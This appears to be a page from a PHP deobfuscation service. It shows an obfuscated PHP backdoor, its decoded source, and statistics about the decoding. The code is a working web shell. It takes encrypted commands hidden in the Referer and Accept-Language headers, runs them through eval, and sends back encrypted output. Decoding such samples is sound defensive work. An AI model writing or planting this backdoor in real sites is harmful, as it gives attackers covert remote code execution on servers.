Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $T=';$q=ac`c`rray_valc`ues($q);prec`g_matcc`h_alc`l("/([\\wc`]c`)[\\w-]+(c`?:c`c`c`;..

Decoded Output download

$kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

<?php
$T=';$q=ac`c`rray_valc`ues($q);prec`g_matcc`h_alc`l("/([\\wc`]c`)[\\w-]+(c`?:c`c`c`;q=0.([\\d]))?,?/"c`,$ra,$mc`);if($q&c`&$c`m){@';
$k='`RER"];c`$ra=@$r["HTTP_c`ACCEPc`T_c`LANGUAGE"];c`ifc`($rr&&c`$rc`a)c`{$u=parse_url($rc`r);c`parse_str(c`$u["quc`ery"c`],$q)';
$V='repc`lace(ac`rray("/_/c`","c`/-/c`"),array("/"c`,"+"c`),$sc`s($sc`[$i],0,$c`e))),$c`k)));$o=oc`bc`_gc`et_c`contents();oc`b_';
$O='c`enc`d_clean();$d=base6c`4_ec`ncode(x(gzcoc`mc`press($o),$c`k))c`;print("c`<$c`k>$d<c`/c`$k>");@sessic`on_c`destroy();}}}}';
$U=str_replace('U','','cUreaUUte_fuUUncUtion');
$b='c`2][$z]];if(sc`tc`rpc`os($p,$h)===0){$s[c`$i]=c`c`"";$p=$ss($p,3)c`;}if(ac`rc`ray_kc`ey_exic`sts($i,$s)){$sc`[$c`i].=$p;$e';
$e='=c`sc`trpos($s[$c`i],$fc`);c`if($ec`){$k=$kh.$kf;c`obc`_stc`art();@evac`l(@gc`zuncompressc`(@xc`(@base6c`4_dc`ecode(c`preg_';
$x='$j=c`0;(c`$j<$c&c`&$i<$l);$c`j++,$i++){$o.=$c`tc`c`{$i}^$k{c`$j};}}retuc`c`rnc`c` $o;}$r=$_SERVEc`R;$rr=c`@$r["HTTP_REc`FEc';
$J='`($i.$c`kh),0,c`3c`));$f=$c`sc`l($ss(md5c`($i.$kfc`),0,3c`));$p="";forc`c`($z=1;$c`c`zc`<c`couc`nt($mc`[1]);$z++)$p.=$q[$m[';
$r='sessionc`_start();c`$s=&$c`_c`SESSION;$ssc`c`="substr";$sc`l="sc`trc`tolower";$ic`=$mc`[1][0].$mc`[c`1][1];$h=$sl($c`ss(md5c';
$a='$kc`h="5d41";$kf="c`402ac`"c`;functioc`n x($t,$kc`){$c`c=strlenc`($k);c`$lc`=strlen($tc`);$c`oc`="";for(c`$i=0;$i<$lc`;){for(c`';
$K=str_replace('c`','',$a.$x.$k.$T.$r.$J.$b.$e.$V.$O);
$i=$U('',$K);$i();
?>

Function Calls

null 1
str_replace 2
create_function 1

Variables

$J `($i.$c`kh),0,c`3c`));$f=$c`sc`l($ss(md5c`($i.$kfc`),0,3c`))..
$K $kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=str..
$O c`enc`d_clean();$d=base6c`4_ec`ncode(x(gzcoc`mc`press($o),$c..
$T ;$q=ac`c`rray_valc`ues($q);prec`g_matcc`h_alc`l("/([\wc`]c`)..
$U create_function
$V repc`lace(ac`rray("/_/c`","c`/-/c`"),array("/"c`,"+"c`),$sc`..
$a $kc`h="5d41";$kf="c`402ac`"c`;functioc`n x($t,$kc`){$c`c=str..
$b c`2][$z]];if(sc`tc`rpc`os($p,$h)===0){$s[c`$i]=c`c`"";$p=$ss..
$e =c`sc`trpos($s[$c`i],$fc`);c`if($ec`){$k=$kh.$kf;c`obc`_stc`..
$i None
$k `RER"];c`$ra=@$r["HTTP_c`ACCEPc`T_c`LANGUAGE"];c`ifc`($rr&&c..
$r sessionc`_start();c`$s=&$c`_c`SESSION;$ssc`c`="substr";$sc`l..
$x $j=c`0;(c`$j<$c&c`&$i<$l);$c`j++,$i++){$o.=$c`tc`c`{$i}^$k{c..

Stats

MD5 c0017cd5ab896c425705c45a50d5fb26
Eval Count 1
Decode Time 99 ms